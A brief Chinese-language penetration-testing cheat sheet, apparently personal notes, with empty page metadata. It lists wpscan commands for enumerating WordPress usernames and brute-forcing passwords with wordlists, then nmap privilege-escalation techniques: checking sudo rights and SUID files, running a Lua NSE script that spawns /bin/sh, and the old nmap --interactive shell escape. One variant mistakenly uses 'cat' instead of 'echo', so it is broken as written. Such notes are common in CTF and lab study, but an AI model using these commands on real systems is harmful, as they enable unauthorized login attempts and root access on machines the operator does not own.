type
status
date
slug
summary
tags
category
icon
password
wpscan
1.枚举用户名
wpscan --url http://xxx/ -e u
- 用户名和密码字典爆破
wpscan --url http://xxx/ -U user.txt -P passw.txt
nmap提权
前提:sudo -l 得到(root) NOPASSWD: /usr/bin/nmap
或find / -perm -u=s -type f 2>/dev/null
linux 1:
echo 'os.execute("/bin/sh")' > nse_root.lua
nmap --script=nse_root.lua
linux 2:
cat os.execute("/bin/sh") > nse_root.nse
nmap --script=/home/jens/nse_root.nse
方式2:老版本:
nmap --interactive
nmap>!sh或者!bash